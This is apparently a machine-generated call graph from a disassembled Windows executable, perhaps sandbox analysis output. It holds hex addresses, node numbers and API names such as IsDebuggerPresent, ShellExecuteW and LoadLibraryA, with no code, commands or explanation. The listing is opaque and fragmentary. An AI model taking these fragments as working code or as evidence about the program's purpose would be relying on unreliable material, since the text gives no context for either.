4d795f _memset __call_reportfault 104351->104352 104353 4d797f IsDebuggerPresent 104352->104353 104359 4d8e3c SetUnhandledExceptionFilter UnhandledExceptionFilter 104353->104359 104356 4d7a66 104358 4d8e27 GetCurrentProcess TerminateProcess 104356->104358 104357 4d7a43 __call_reportfault 104360 4db4bf 104357->104360 104358->104350 104359->104357 104361 4db4c9 IsProcessorFeaturePresent 104360->104361 104362 4db4c7 104360->104362 104364 4e4560 104361->104364 104362->104356 104367 4e450f 5 API calls 2 library calls 104364->104367 104366 4e4643 104366->104356 104367->104366 104368->104253 104370 4d8984 __lock 47 API calls 104369->104370 104371 4d2030 104370->104371 104427 4d8ae8 RtlLeaveCriticalSection 104371->104427 104373 4b36fb 104374 4d208d 104373->104374 
104375 4d2097 104374->104375 104376 4d20b1 104374->104376 104375->104376 104428 4d889e 47 API calls __getptd_noexit 104375->104428 104376->104261 104378 4d20a1 104429 4d7aa0 8 API calls __cftoe2_l 104378->104429 104380 4d20ac 104380->104261 104381->104263 104430 4b4257 104382->104430 104384 4b377f IsDebuggerPresent 104385 5221b7 MessageBoxA 104384->104385 104386 4b378d 104384->104386 104389 5221d0 104385->104389 104387 4b3852 104386->104387 104386->104389 104390 4b37aa 104386->104390 104388 4b3859 SetCurrentDirectoryW 104387->104388 104392 4b3716 SystemParametersInfoW 104388->104392 104589 4f2f5b 48 API calls 104389->104589 104494 4b3bff 104390->104494 104392->104266 104395 5221e0 104399 5221f6 SetCurrentDirectoryW 104395->104399 104396 4b37c8 GetFullPathNameW 104504 4b34f3 104396->104504 104399->104392 104400 4b380f 104401 4b3818 104400->104401 104590 4ebe31 AllocateAndInitializeSid CheckTokenMembership FreeSid 104400->104590 104519 4b30a5 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 104401->104519 104404 522213 104404->104401 104407 522224 GetModuleFileNameW 104404->104407 104409 4bcaee 48 API calls 104407->104409 104408 4b3822 104410 4b3837 104408->104410 104412 4b3598 67 API calls 104408->104412 104411 522245 104409->104411 104527 4be1f0 104410->104527 104414 522271 104411->104414 104415 52224c 104411->104415 104412->104410 104594 4b39e8 48 API calls 2 library calls 104414->104594 104591 4b39e8 48 API calls 2 library calls 104415->104591 104419 52226d GetForegroundWindow ShellExecuteW 104424 5222a5 Mailbox 104419->104424 104421 522257 104592 4b39e8 48 API calls 2 library calls 104421->104592 104424->104387 104425 522264 104593 4b39e8 48 API calls 2 library calls 104425->104593 104427->104373 104428->104378 104429->104380 104595 4b3c70 104430->104595 104434 4b4278 GetModuleFileNameW 104612 4b34c1 104434->104612 104439 4bcaee 48 API calls 104440 4b42ba 104439->104440 104627 4bd380 104440->104627 104442 4b42ca Mailbox 104443 4bcaee 48 API calls 
104442->104443 104444 4b42f2 104443->104444 104445 4bd380 55 API calls 104444->104445 104446 4b4305 Mailbox 104445->104446 104447 4bcaee 48 API calls 104446->104447 104448 4b4316 104447->104448 104631 4bd2d2 104448->104631 104450 4b4328 Mailbox 104451 4bd3d2 48 API calls 104450->104451 104452 4b433b 104451->104452 104637 4b4477 104452->104637 104456 4b4355 104457 4b435f 104456->104457 104458 5220f7 104456->104458 104460 4d1bc7 _W_store_winword 59 API calls 104457->104460 104459 4b4477 48 API calls 104458->104459 104461 52210b 104459->104461 104462 4b436a 104460->104462 104465 4b4477 48 API calls 104461->104465 104462->104461 104463 4b4374 104462->104463 104464 4d1bc7 _W_store_winword 59 API calls 104463->104464 104466 4b437f 104464->104466 104467 522127 104465->104467 104468 4b4389 104466->104468 104469 52212f GetModuleFileNameW 104466->104469 104467->104469 104470 4d1bc7 _W_store_winword 59 API calls 104468->104470 104471 4b4477 48 API calls 104469->104471 104472 4b4394 104470->104472 104473 522160 104471->104473 104475 4b43d6 104472->104475 104479 4b4477 48 API calls 104472->104479 104483 522185 _wcscpy 104472->104483 104474 4bc935 48 API calls 104473->104474 104476 52216e 104474->104476 104477 4b43e7 104475->104477 104475->104483 104478 4b4477 48 API calls 104476->104478 104653 4b3320 104477->104653 104481 52217d 104478->104481 104482 4b43b8 _wcscpy 104479->104482 104481->104483 104488 4b4477 48 API calls 104482->104488 104485 4b4477 48 API calls 104483->104485 104484 4b43ff 104664 4c14a0 104484->104664 104487 5221ab 104485->104487 104487->104487 104488->104475 104489 4c14a0 48 API calls 104491 4b440f 104489->104491 104491->104489 104492 4b4477 48 API calls 104491->104492 104493 4b4451 Mailbox 104491->104493 104680 4b7bef 48 API calls 104491->104680 104492->104491 104493->104384 104499 4b3c1f _memset 104494->104499 104496 4b3c28 105219 4b3a67 SHGetMalloc 104496->105219 104498 4b3c31 105224 4b3b45 GetFullPathNameW 104498->105224 104500 4b37c0 104499->104500 
105212 4b31b8 104499->105212 104500->104387 104500->104396 105300 4ba716 104504->105300 104506 4b3501 104507 4b3575 104506->104507 105311 4b21dd 86 API calls 104506->105311 104507->104395 104507->104400 104509 4b350a 104509->104507 105312 4b5460 88 API calls Mailbox 104509->105312 104511 4b3513 104511->104507 104512 4b3517 GetFullPathNameW 104511->104512 104513 4b7e53 48 API calls 104512->104513 104514 4b3541 104513->104514 104515 4b7e53 48 API calls 104514->104515 104516 4b354e 104515->104516 104517 5266b4 _wcscat 104516->104517 104518 4b7e53 48 API calls 104516->104518 104518->104507 104520 5221b0 104519->104520 104521 4b310f 104519->104521 105315 4b318a 104521->105315 104526 4b2e9d CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104526->104408 104528 4be216 104527->104528 104587 4be226 Mailbox 104527->104587 104529 4be670 104528->104529 104528->104587 105401 4cecee 346 API calls 104529->105401 104530 4fd520 86 API calls 104530->104587 104532 4b3842 104532->104387 104588 4b2b94 Shell_NotifyIconW _memset 104532->104588 104534 4be681 104534->104532 104536 4be68e 104534->104536 104535 4be26c PeekMessageW 104535->104587 105403 4cec33 346 API calls Mailbox 104536->105403 104538 525b13 Sleep 104538->104587 104539 4be695 LockWindowUpdate DestroyWindow GetMessageW 104539->104532 104540 4be6c7 104539->104540 104543 5262a7 TranslateMessage DispatchMessageW GetMessageW 104540->104543 104541 4be4e7 104541->104532 105402 4b322e 16 API calls 104541->105402 104543->104543 104546 5262d7 104543->104546 104545 4be657 PeekMessageW 104545->104587 104546->104532 104547 4be517 timeGetTime 104547->104587 104549 4bc935 48 API calls 104549->104587 104550 4be641 TranslateMessage DispatchMessageW 104550->104545 104551 4d010a 48 API calls 104551->104587 104552 525dfc WaitForSingleObject 104555 525e19 GetExitCodeProcess CloseHandle 104552->104555 104552->104587 104553 4bd3d2 48 API calls 104583 525cce Mailbox 104553->104583 104554 526147 Sleep 104554->104583 104555->104587 104556 
4be6cc timeGetTime 105404 4ccf79 49 API calls 104556->105404 104559 525feb Sleep 104559->104583 104562 4b1000 322 API calls 104562->104587 104563 4ce3a5 timeGetTime 104563->104583 104564 5261de GetExitCodeProcess 104565 5261f4 WaitForSingleObject 104564->104565 104566 52620a CloseHandle 104564->104566 104565->104566 104565->104587 104566->104583 104567 525cea Sleep 104567->104587 104568 525cd7 Sleep 104568->104567 104569 518a48 108 API calls 104569->104583 104570 4b1dce 107 API calls 104570->104583 104572 526266 Sleep 104572->104587 104573 4ccf79 49 API calls 104573->104587 104576 4bcaee 48 API calls 104576->104583 104579 4bd380 55 API calls 104579->104583 104583->104553 104583->104563 104583->104564 104583->104567 104583->104568 104583->104569 104583->104570 104583->104572 104583->104576 104583->104579 104583->104587 105406 4f56dc 49 API calls Mailbox 104583->105406 105407 4ccf79 49 API calls 104583->105407 105408 4b1000 346 API calls 104583->105408 105410 50d12a 50 API calls 104583->105410 105411 4f8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104583->105411 105412 4f6f5b 63 API calls 3 library calls 104583->105412 104585 4bcaee 48 API calls 104585->104587 104586 4bd380 55 API calls 104586->104587 104587->104530 104587->104535 104587->104538 104587->104541 104587->104545 104587->104547 104587->104549 104587->104550 104587->104551 104587->104552 104587->104554 104587->104556 104587->104559 104587->104562 104587->104567 104587->104573 104587->104583 104587->104585 104587->104586 105323 4be7e0 104587->105323 105330 4bea00 104587->105330 105380 4c44e0 104587->105380 105397 4be7b0 346 API calls Mailbox 104587->105397 105398 4c3680 346 API calls 2 library calls 104587->105398 105399 4cf381 TranslateAcceleratorW 104587->105399 105400 4ced1a IsDialogMessageW GetClassLongW 104587->105400 105405 518b20 48 API calls 104587->105405 105409 4bfa40 346 API calls 3 library calls 104587->105409 104588->104387 104589->104395 
104590->104404 104591->104421 104592->104425 104593->104419 104594->104419 104596 4bd3d2 48 API calls 104595->104596 104597 4b3c80 104596->104597 104598 4ba359 104597->104598 104599 4ba366 __ftell_nolock 104598->104599 104600 4b7e53 48 API calls 104599->104600 104605 4ba4cc Mailbox 104599->104605 104602 4ba398 104600->104602 104610 4ba3ce Mailbox 104602->104610 104681 4ba4f6 104602->104681 104603 4ba4f6 48 API calls 104603->104610 104604 4ba49f 104604->104605 104606 4bcaee 48 API calls 104604->104606 104605->104434 104608 4ba4c0 104606->104608 104607 4bcaee 48 API calls 104607->104610 104685 4b5b47 48 API calls _memmove 104608->104685 104610->104603 104610->104604 104610->104605 104610->104607 104684 4b5b47 48 API calls _memmove 104610->104684 104686 4b3f9b 104612->104686 104615 4b34ea 104624 4b8182 104615->104624 104618 5234c3 104620 4d28ca _free 47 API calls 104618->104620 104621 5234d0 104620->104621 104622 4b3e39 84 API calls 104621->104622 104623 5234d9 104622->104623 104623->104623 104625 4d010a 48 API calls 104624->104625 104626 4b42ad 104625->104626 104626->104439 104628 4bd38b 104627->104628 104629 4bd3b4 104628->104629 105202 4bd772 55 API calls 104628->105202 104629->104442 104632 4bd30a 104631->104632 104633 4bd2df 104631->104633 104632->104450 104636 4bd2e6 104633->104636 105204 4bd349 53 API calls 104633->105204 104636->104632 105203 4bd349 53 API calls 104636->105203 104638 4b449a 104637->104638 104639 4b4481 104637->104639 104640 4b7e53 48 API calls 104638->104640 104641 4bc935 48 API calls 104639->104641 104642 4b4347 104640->104642 104641->104642 104643 4d1bc7 104642->104643 104644 4d1c48 104643->104644 104645 4d1bd3 104643->104645 105207 4d1c5a 59 API calls 3 library calls 104644->105207 104652 4d1bf8 104645->104652 105205 4d889e 47 API calls __getptd_noexit 104645->105205 104648 4d1c55 104648->104456 104649 4d1bdf 105206 4d7aa0 8 API calls __cftoe2_l 104649->105206 104651 4d1bea 104651->104456 104652->104456 104654 4b3334 104653->104654 104656 
4b3339 Mailbox 104653->104656 105208 4b342c 48 API calls 104654->105208 104662 4b3347 104656->104662 105209 4b346e 48 API calls 104656->105209 104658 4d010a 48 API calls 104660 4b33d8 104658->104660 104659 4b3422 104659->104484 104661 4d010a 48 API calls 104660->104661 104663 4b33e3 104661->104663 104662->104658 104662->104659 104663->104484 104665 4c1606 104664->104665 104667 4c14b2 104664->104667 104665->104491 104666 4c14be 104674 4c14c9 104666->104674 105211 4b346e 48 API calls 104666->105211 104667->104666 104669 4d010a 48 API calls 104667->104669 104670 525299 104669->104670 104672 4d010a 48 API calls 104670->104672 104671 4c156d 104671->104491 104679 5252a4 104672->104679 104673 4d010a 48 API calls 104675 4c15af 104673->104675 104674->104671 104674->104673 104676 4c15c2 104675->104676 105210 4cd6b4 48 API calls 104675->105210 104676->104491 104678 4d010a 48 API calls 104678->104679 104679->104666 104679->104678 104680->104491 104682 4bb8a7 48 API calls 104681->104682 104683 4ba501 104682->104683 104683->104602 104684->104610 104685->104605 104751 4b3f5d 104686->104751 104691 525830 104693 4b3e39 84 API calls 104691->104693 104692 4b3fc6 LoadLibraryExW 104761 4b3e78 104692->104761 104695 525837 104693->104695 104697 4b3e78 3 API calls 104695->104697 104699 52583f 104697->104699 104787 4b417d 104699->104787 104700 4b3fed 104700->104699 104701 4b3ff9 104700->104701 104703 4b3e39 84 API calls 104701->104703 104705 4b34e2 104703->104705 104705->104615 104710 4fcc82 104705->104710 104707 525866 104795 4b41cb 104707->104795 104709 525873 104711 4b41a7 83 API calls 104710->104711 104712 4fccf1 104711->104712 104976 4fce59 104712->104976 104715 4b417d 64 API calls 104716 4fcd1e 104715->104716 104717 4b417d 64 API calls 104716->104717 104718 4fcd2e 104717->104718 104719 4b417d 64 API calls 104718->104719 104720 4fcd49 104719->104720 104721 4b417d 64 API calls 104720->104721 104722 4fcd64 104721->104722 104723 4b41a7 83 API calls 104722->104723 104724 4fcd7b 
104723->104724 104725 4d45ec __crtGetStringTypeA_stat 47 API calls 104724->104725 104726 4fcd82 104725->104726 104727 4d45ec __crtGetStringTypeA_stat 47 API calls 104726->104727 104728 4fcd8c 104727->104728 104729 4b417d 64 API calls 104728->104729 104730 4fcda0 104729->104730 104731 4fc846 GetSystemTimeAsFileTime 104730->104731 104732 4fcdb3 104731->104732 104733 4fcddd 104732->104733 104734 4fcdc8 104732->104734 104736 4fcde3 104733->104736 104737 4fce42 104733->104737 104735 4d28ca _free 47 API calls 104734->104735 104740 4fcdce 104735->104740 104982 4fc251 118 API calls __fcloseall 104736->104982 104739 4d28ca _free 47 API calls 104737->104739 104742 4fcd07 104739->104742 104743 4d28ca _free 47 API calls 104740->104743 104741 4fce3a 104744 4d28ca _free 47 API calls 104741->104744 104742->104618 104745 4b3e39 104742->104745 104743->104742 104744->104742 104746 4b3e43 104745->104746 104750 4b3e4a 104745->104750 104983 4d4274 104746->104983 104748 4b3e6a FreeLibrary 104749 4b3e59 104748->104749 104749->104618 104750->104748 104750->104749 104800 4b3f20 104751->104800 104754 4b3f85 104756 4b3f8d FreeLibrary 104754->104756 104757 4b3f96 104754->104757 104756->104757 104758 4d4129 104757->104758 104808 4d413e 104758->104808 104760 4b3fba 104760->104691 104760->104692 104887 4b3eb3 104761->104887 104763 4b3e9f 104766 4b3ea8 FreeLibrary 104763->104766 104767 4b3eb1 104763->104767 104766->104767 104768 4b4010 104767->104768 104769 4d010a 48 API calls 104768->104769 104770 4b4025 104769->104770 104895 4b4bce 104770->104895 104772 4b4031 _memmove 104773 4b406c 104772->104773 104775 4b4129 104772->104775 104776 4b4161 104772->104776 104774 4b41cb 57 API calls 104773->104774 104784 4b4075 104774->104784 104898 4b31f2 CreateStreamOnHGlobal 104775->104898 104909 4fd03f 93 API calls 104776->104909 104779 4b417d 64 API calls 104779->104784 104781 4b4109 104781->104700 104782 525794 104783 4b41a7 83 API calls 104782->104783 104785 5257a8 104783->104785 104784->104779 
104784->104781 104784->104782 104904 4b41a7 104784->104904 104786 4b417d 64 API calls 104785->104786 104786->104781 104788 4b418f 104787->104788 104789 52587d 104787->104789 104933 4d44ae 104788->104933 104792 4fc846 104953 4fc6a0 104792->104953 104794 4fc85c 104794->104707 104796 4b41da 104795->104796 104797 5258bf 104795->104797 104958 4d4af5 104796->104958 104799 4b41e2 104799->104709 104804 4b3f32 104800->104804 104803 4b3f08 LoadLibraryA GetProcAddress 104803->104754 104805 4b3f28 104804->104805 104806 4b3f3b LoadLibraryA 104804->104806 104805->104754 104805->104803 104806->104805 104807 4b3f4c GetProcAddress 104806->104807 104807->104805 104811 4d414a _flsall 104808->104811 104809 4d415d 104856 4d889e 47 API calls __getptd_noexit 104809->104856 104811->104809 104813 4d418e 104811->104813 104812 4d4162 104857 4d7aa0 8 API calls __cftoe2_l 104812->104857 104827 4df278 104813->104827 104816 4d4193 104817 4d419c 104816->104817 104818 4d41a9 104816->104818 104858 4d889e 47 API calls __getptd_noexit 104817->104858 104820 4d41d3 104818->104820 104821 4d41b3 104818->104821 104841 4df390 104820->104841 104859 4d889e 47 API calls __getptd_noexit 104821->104859 104824 4d416d _flsall @_EH4_CallFilterFunc@8 104824->104760 104828 4df284 _flsall 104827->104828 104829 4d8984 __lock 47 API calls 104828->104829 104830 4df292 104829->104830 104831 4df309 104830->104831 104837 4d8a0c __mtinitlocknum 47 API calls 104830->104837 104839 4df302 104830->104839 104864 4d5ade 48 API calls __lock 104830->104864 104865 4d5b48 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 104830->104865 104866 4d7660 47 API calls __crtGetStringTypeA_stat 104831->104866 104834 4df310 104836 4df31f InitializeCriticalSectionAndSpinCount RtlEnterCriticalSection 104834->104836 104834->104839 104835 4df37c _flsall 104835->104816 104836->104839 104837->104830 104861 4df387 104839->104861 104849 4df3b0 __wopenfile 104841->104849 104842 4df3ca 104871 4d889e 47 API calls __getptd_noexit 104842->104871 
104844 4df3cf 104872 4d7aa0 8 API calls __cftoe2_l 104844->104872 104846 4df5e8 104868 4e7179 104846->104868 104847 4d41de 104860 4d4200 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 104847->104860 104849->104842 104855 4df585 104849->104855 104873 4d247b 59 API calls 2 library calls 104849->104873 104851 4df57e 104851->104855 104874 4d247b 59 API calls 2 library calls 104851->104874 104853 4df59d 104853->104855 104875 4d247b 59 API calls 2 library calls 104853->104875 104855->104842 104855->104846 104856->104812 104857->104824 104858->104824 104859->104824 104860->104824 104867 4d8ae8 RtlLeaveCriticalSection 104861->104867 104863 4df38e 104863->104835 104864->104830 104865->104830 104866->104834 104867->104863 104876 4e6961 104868->104876 104870 4e7192 104870->104847 104871->104844 104872->104847 104873->104851 104874->104853 104875->104855 104879 4e696d _flsall 104876->104879 104877 4e697f 104878 4d889e __cftoe2_l 47 API calls 104877->104878 104880 4e6984 104878->104880 104879->104877 104881 4e69b6 104879->104881 104882 4d7aa0 __cftoe2_l 8 API calls 104880->104882 104883 4e6a28 __wsopen_helper 110 API calls 104881->104883 104886 4e698e _flsall 104882->104886 104884 4e69d3 104883->104884 104885 4e69fc __wsopen_helper RtlLeaveCriticalSection 104884->104885 104885->104886 104886->104870 104891 4b3ec5 104887->104891 104890 4b3ef0 LoadLibraryA GetProcAddress 104890->104763 104892 4b3e91 104891->104892 104893 4b3ece LoadLibraryA 104891->104893 104892->104763 104892->104890 104893->104892 104894 4b3edf GetProcAddress 104893->104894 104894->104892 104896 4d010a 48 API calls 104895->104896 104897 4b4be0 104896->104897 104897->104772 104899 4b320c FindResourceExW 104898->104899 104903 4b3229 104898->104903 104900 5257d3 LoadResource 104899->104900 104899->104903 104901 5257e8 SizeofResource 104900->104901 104900->104903 104902 5257fc LockResource 104901->104902 104901->104903 104902->104903 104903->104773 104905 4b41b6 104904->104905 104906 52589d 
104904->104906 104910 4d471d 104905->104910 104908 4b41c4 104908->104784 104909->104773 104914 4d4729 _flsall 104910->104914 104911 4d4737 104923 4d889e 47 API calls __getptd_noexit 104911->104923 104913 4d475d 104925 4d5a9f 104913->104925 104914->104911 104914->104913 104915 4d473c 104924 4d7aa0 8 API calls __cftoe2_l 104915->104924 104917 4d4763 104931 4d468e 81 API calls 4 library calls 104917->104931 104920 4d4772 104932 4d4794 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 104920->104932 104922 4d4747 _flsall 104922->104908 104923->104915 104924->104922 104926 4d5aaf 104925->104926 104927 4d5ad1 RtlEnterCriticalSection 104925->104927 104926->104927 104928 4d5ab7 104926->104928 104929 4d5ac7 104927->104929 104930 4d8984 __lock 47 API calls 104928->104930 104929->104917 104930->104929 104931->104920 104932->104922 104936 4d44c9 104933->104936 104935 4b41a0 104935->104792 104937 4d44d5 _flsall 104936->104937 104938 4d4518 104937->104938 104939 4d44eb _memset 104937->104939 104940 4d4510 _flsall 104937->104940 104941 4d5a9f __lock_file 48 API calls 104938->104941 104949 4d889e 47 API calls __getptd_noexit 104939->104949 104940->104935 104943 4d451e 104941->104943 104951 4d42eb 62 API calls 5 library calls 104943->104951 104944 4d4505 104950 4d7aa0 8 API calls __cftoe2_l 104944->104950 104946 4d4534 104952 4d4552 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 104946->104952 104949->104944 104950->104940 104951->104946 104952->104940 104956 4d40da GetSystemTimeAsFileTime 104953->104956 104955 4fc6af 104955->104794 104957 4d4108 __aulldiv 104956->104957 104957->104955 104959 4d4b01 _flsall 104958->104959 104960 4d4b0f 104959->104960 104961 4d4b24 104959->104961 104972 4d889e 47 API calls __getptd_noexit 104960->104972 104963 4d5a9f __lock_file 48 API calls 104961->104963 104965 4d4b2a 104963->104965 104964 4d4b14 104973 4d7aa0 8 API calls __cftoe2_l 104964->104973 104974 4d479c 55 API calls 5 library calls 104965->104974 104968 4d4b35 104975 
4d4b55 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 104968->104975 104970 4d4b47 104971 4d4b1f _flsall 104970->104971 104971->104799 104972->104964 104973->104971 104974->104968 104975->104970 104981 4fce6d __tzset_nolock _wcscmp 104976->104981 104977 4b417d 64 API calls 104977->104981 104978 4fcd03 104978->104715 104978->104742 104979 4fc846 GetSystemTimeAsFileTime 104979->104981 104980 4b41a7 83 API calls 104980->104981 104981->104977 104981->104978 104981->104979 104981->104980 104982->104741 104984 4d4280 _flsall 104983->104984 104985 4d42ac 104984->104985 104986 4d4294 104984->104986 104989 4d42a4 _flsall 104985->104989 104990 4d5a9f __lock_file 48 API calls 104985->104990 105012 4d889e 47 API calls __getptd_noexit 104986->105012 104988 4d4299 105013 4d7aa0 8 API calls __cftoe2_l 104988->105013 104989->104750 104992 4d42be 104990->104992 104996 4d4208 104992->104996 104997 4d422b 104996->104997 104998 4d4217 104996->104998 105000 4d4227 104997->105000 105015 4d3914 104997->105015 105055 4d889e 47 API calls __getptd_noexit 104998->105055 105014 4d42e3 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 105000->105014 105002 4d421c 105056 4d7aa0 8 API calls __cftoe2_l 105002->105056 105008 4d4245 105032 4df782 105008->105032 105010 4d424b 105010->105000 105011 4d28ca _free 47 API calls 105010->105011 105011->105000 105012->104988 105013->104989 105014->104989 105016 4d3927 105015->105016 105017 4d394b 105015->105017 105016->105017 105018 4d35c3 __flswbuf 47 API calls 105016->105018 105021 4df8e6 105017->105021 105019 4d3944 105018->105019 105057 4dbd14 105019->105057 105022 4d423f 105021->105022 105023 4df8f3 105021->105023 105025 4d35c3 105022->105025 105023->105022 105024 4d28ca _free 47 API calls 105023->105024 105024->105022 105026 4d35cd 105025->105026 105027 4d35e2 105025->105027 105163 4d889e 47 API calls __getptd_noexit 105026->105163 105027->105008 105029 4d35d2 105164 4d7aa0 8 API calls __cftoe2_l 105029->105164 105031 4d35dd 
105031->105008 105033 4df78e _flsall 105032->105033 105034 4df796 105033->105034 105039 4df7ae 105033->105039 105180 4d886a 47 API calls __getptd_noexit 105034->105180 105035 4df82b 105184 4d886a 47 API calls __getptd_noexit 105035->105184 105037 4df79b 105181 4d889e 47 API calls __getptd_noexit 105037->105181 105039->105035 105042 4df7d8 105039->105042 105041 4df830 105185 4d889e 47 API calls __getptd_noexit 105041->105185 105044 4db6a0 ___lock_fhandle 49 API calls 105042->105044 105046 4df7de 105044->105046 105045 4df838 105186 4d7aa0 8 API calls __cftoe2_l 105045->105186 105048 4df7fc 105046->105048 105049 4df7f1 105046->105049 105182 4d889e 47 API calls __getptd_noexit 105048->105182 105165 4df84c 105049->105165 105050 4df7a3 _flsall 105050->105010 105053 4df7f7 105183 4df823 RtlLeaveCriticalSection __unlock_fhandle 105053->105183 105055->105002 105056->105000 105058 4dbd20 _flsall 105057->105058 105059 4dbd28 105058->105059 105060 4dbd40 105058->105060 105155 4d886a 47 API calls __getptd_noexit 105059->105155 105061 4dbdd5 105060->105061 105066 4dbd72 105060->105066 105160 4d886a 47 API calls __getptd_noexit 105061->105160 105064 4dbd2d 105156 4d889e 47 API calls __getptd_noexit 105064->105156 105082 4db6a0 105066->105082 105067 4dbdda 105161 4d889e 47 API calls __getptd_noexit 105067->105161 105070 4dbd78 105072 4dbd9e 105070->105072 105073 4dbd8b 105070->105073 105071 4dbde2 105162 4d7aa0 8 API calls __cftoe2_l 105071->105162 105157 4d889e 47 API calls __getptd_noexit 105072->105157 105091 4dbdf6 105073->105091 105075 4dbd35 _flsall 105075->105017 105078 4dbd97 105159 4dbdcd RtlLeaveCriticalSection __unlock_fhandle 105078->105159 105079 4dbda3 105158 4d886a 47 API calls __getptd_noexit 105079->105158 105083 4db6ac _flsall 105082->105083 105084 4db6f9 RtlEnterCriticalSection 105083->105084 105085 4d8984 __lock 47 API calls 105083->105085 105086 4db71f _flsall 105084->105086 105087 4db6d0 105085->105087 105086->105070 105088 4db6ed 105087->105088 105089 4db6db 
InitializeCriticalSectionAndSpinCount 105087->105089 105090 4db723 ___lock_fhandle RtlLeaveCriticalSection 105088->105090 105089->105088 105090->105084 105092 4dbe03 __ftell_nolock 105091->105092 105093 4dbe35 105092->105093 105094 4dbe5f 105092->105094 105095 4dbe40 105092->105095 105096 4db4bf __crtGetStringTypeA_stat 6 API calls 105093->105096 105098 4dbe9c 105094->105098 105099 4dbeb8 105094->105099 105097 4d886a __lseeki64 47 API calls 105095->105097 105100 4dc61e 105096->105100 105101 4dbe45 105097->105101 105102 4d886a __lseeki64 47 API calls 105098->105102 105104 4dbecf 105099->105104 105107 4e05df __lseeki64_nolock 49 API calls 105099->105107 105100->105078 105103 4d889e __cftoe2_l 47 API calls 105101->105103 105105 4dbea1 105102->105105 105106 4dbe4c 105103->105106 105108 4e49a2 __flswbuf 47 API calls 105104->105108 105109 4d889e __cftoe2_l 47 API calls 105105->105109 105110 4d7aa0 __cftoe2_l 8 API calls 105106->105110 105107->105104 105111 4dbedd 105108->105111 105112 4dbea8 105109->105112 105110->105093 105113 4dc1fe 105111->105113 105117 4d869d _wcstok 47 API calls 105111->105117 105116 4d7aa0 __cftoe2_l 8 API calls 105112->105116 105114 4dc56b WriteFile 105113->105114 105115 4dc216 105113->105115 105119 4dc594 GetLastError 105114->105119 105127 4dc1c3 105114->105127 105118 4dc30d 105115->105118 105128 4dc22c 105115->105128 105116->105093 105120 4dbf03 GetConsoleMode 105117->105120 105126 4dc318 105118->105126 105130 4dc416 105118->105130 105119->105127 105120->105113 105122 4dbf3c 105120->105122 105121 4dc5ce 105121->105093 105125 4d889e __cftoe2_l 47 API calls 105121->105125 105122->105113 105123 4dbf4c GetConsoleCP 105122->105123 105123->105127 105149 4dbf75 105123->105149 105124 4dc29c WriteFile 105124->105119 105129 4dc2d9 105124->105129 105131 4dc5f6 105125->105131 105126->105121 105135 4dc391 WriteFile 105126->105135 105127->105093 105127->105121 105132 4dc5aa 105127->105132 105128->105121 105128->105124 105129->105127 105129->105128 105141 
4dc308 105129->105141 105130->105121 105136 4dc48b WideCharToMultiByte 105130->105136 105137 4d886a __lseeki64 47 API calls 105131->105137 105133 4dc5c5 105132->105133 105134 4dc5b1 105132->105134 105139 4d887d __dosmaperr 47 API calls 105133->105139 105138 4d889e __cftoe2_l 47 API calls 105134->105138 105135->105119 105140 4dc3e0 105135->105140 105136->105119 105147 4dc4d2 105136->105147 105137->105093 105142 4dc5b6 105138->105142 105139->105093 105140->105126 105140->105127 105140->105141 105141->105127 105144 4d886a __lseeki64 47 API calls 105142->105144 105143 4dc4da WriteFile 105145 4dc52d GetLastError 105143->105145 105143->105147 105144->105093 105145->105147 105146 4d22a8 __chsize_nolock 57 API calls 105146->105149 105147->105127 105147->105130 105147->105141 105147->105143 105148 4e4ea7 59 API calls __chsize_nolock 105148->105149 105149->105127 105149->105146 105149->105148 105150 4dc042 WideCharToMultiByte 105149->105150 105151 4dc0a9 105149->105151 105150->105127 105152 4dc07d WriteFile 105150->105152 105151->105119 105151->105127 105151->105149 105153 4e6634 WriteConsoleW CreateFileW __chsize_nolock 105151->105153 105154 4dc0d4 WriteFile 105151->105154 105152->105119 105152->105151 105153->105151 105154->105119 105154->105151 105155->105064 105156->105075 105157->105079 105158->105078 105159->105075 105160->105067 105161->105071 105162->105075 105163->105029 105164->105031 105187 4db957 105165->105187 105167 4df8b0 105200 4db8d1 48 API calls 2 library calls 105167->105200 105168 4df85a 105168->105167 105171 4db957 __lseek_nolock 47 API calls 105168->105171 105179 4df88e 105168->105179 105170 4df8b8 105176 4df8da 105170->105176 105201 4d887d 47 API calls 3 library calls 105170->105201 105173 4df885 105171->105173 105172 4db957 __lseek_nolock 47 API calls 105174 4df89a CloseHandle 105172->105174 105177 4db957 __lseek_nolock 47 API calls 105173->105177 105174->105167 105178 4df8a6 GetLastError 105174->105178 105176->105053 105177->105179 105178->105167 
105179->105167 105179->105172 105180->105037 105181->105050 105182->105053 105183->105050 105184->105041 105185->105045 105186->105050 105188 4db977 105187->105188 105189 4db962 105187->105189 105192 4d886a __lseeki64 47 API calls 105188->105192 105194 4db99c 105188->105194 105190 4d886a __lseeki64 47 API calls 105189->105190 105191 4db967 105190->105191 105193 4d889e __cftoe2_l 47 API calls 105191->105193 105195 4db9a6 105192->105195 105196 4db96f 105193->105196 105194->105168 105197 4d889e __cftoe2_l 47 API calls 105195->105197 105196->105168 105198 4db9ae 105197->105198 105199 4d7aa0 __cftoe2_l 8 API calls 105198->105199 105199->105196 105200->105170 105201->105176 105202->104629 105203->104632 105204->104636 105205->104649 105206->104651 105207->104648 105208->104656 105209->104662 105210->104676 105211->104674 105213 524aa5 GetFullPathNameW 105212->105213 105214 4b31c7 105212->105214 105216 524abd 105213->105216 105269 4b3bcf 105214->105269 105217 4b31cd GetFullPathNameW 105218 4b31e7 105217->105218 105218->104496 105220 4b3a8b SHGetDesktopFolder 105219->105220 105223 4b3ade 105219->105223 105221 4b3a99 105220->105221 105220->105223 105222 4b3ac8 SHGetPathFromIDListW 105221->105222 105221->105223 105222->105223 105223->104498 105225 4b3ba9 105224->105225 105226 4b3b72 105224->105226 105225->105226 105227 4d1bc7 _W_store_winword 59 API calls 105225->105227 105230 5233e5 105225->105230 105228 4b3bcf 48 API calls 105226->105228 105227->105225 105229 4b3b7d 105228->105229 105273 4b197e 105229->105273 105233 4b197e 48 API calls 105234 4b3b9f 105233->105234 105235 4b3dcb 105234->105235 105236 4b3f9b 